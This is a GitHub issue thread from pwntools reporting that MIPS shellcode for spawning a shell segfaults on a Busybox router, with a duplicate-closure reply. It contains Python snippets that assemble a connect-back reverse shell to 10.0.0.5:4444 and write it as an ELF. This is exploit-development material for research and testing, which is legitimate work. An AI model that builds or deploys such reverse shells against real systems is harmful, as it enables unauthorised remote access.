### ISSUE TITLE
shellcraft.mips.linux.dupsh/shellcraft.mips.linux.sh fails on Busybox systems

### ISSUE THREAD

**Issue by 0x27** [Gallopsled/pwntools#692]
TL;DR: If you try create some shellcode or an ELF for MIPS (Big Endian) systems that calls the linux.dupsh or linux.sh functionality, your payload segfaults somewhere in the 'sh' spawning part.

Outline of how this issue arose is below.

Testing hardware was my Ubiquiti router - with an Atheros AR7240 (MIPS 24Kc V7.4) chipset. Unfortunately have not gotten gdb/strace and all that working yet.

Simple example with `dupsh` function:

```
from pwn import *
context.clear()
context.arch = 'mips'
context.bits = 32
context.endian = 'big'
stage0 = shellcraft.mips.linux.connect("10.0.0.5", 4444)
stage1 = shellcraft.mips.linux.dupsh(sock='$s0')
payload = stage0 + stage1
data = make_elf(asm(payload))
with open("/tmp/mipstest1",'wb+') as f:
    f.write(data)
    f.flush()
```

When this is executed, the connect() will happen just fine, and then the payload will immediately segfault.

So I tried work out if it was an issue in the dup2 or the shell spawning stuff.

```
from pwn import *
context.clear()
context.arch = 'mips'
context.bits = 32
context.endian = 'big'
stage0 = shellcraft.mips.linux.connect("10.0.0.5", 4444)
stage1 = shellcraft.mips.linux.dup2("$s0", 0)
stage2 = shellcraft.mips.linux.dup2("$s0", 1)
stage3 = shellcraft.mips.linux.dup2("$s0", 2)
stage4 = shellcraft.mips.linux.sh()
payload = stage0 + stage1 + stage3 + stage4
data = make_elf(asm(payload))
with open("/tmp/mipstest2",'wb+') as f:
    f.write(data)
    f.flush()
```

The fd duplication worked fine, the crash was happening _somewhere_ in the land of the shell spawning function. I think its the execve/sh spawning code not really liking symlinks and trying to call the path /bin/sh. It would be useful to have an argument to specify the shell you want to pop, or have an alternative "linux.busybox" or similar.

I think this is related to https://github.com/Gallopsled/pwntools/issues/626
Possibly related: https://github.com/Gallopsled/pwntools/issues/693

**Comment by zachriggle** [comment]
Duplicate of #626

However, MIPS does not have any support for `pushstr_array` to provide arguments anyway.
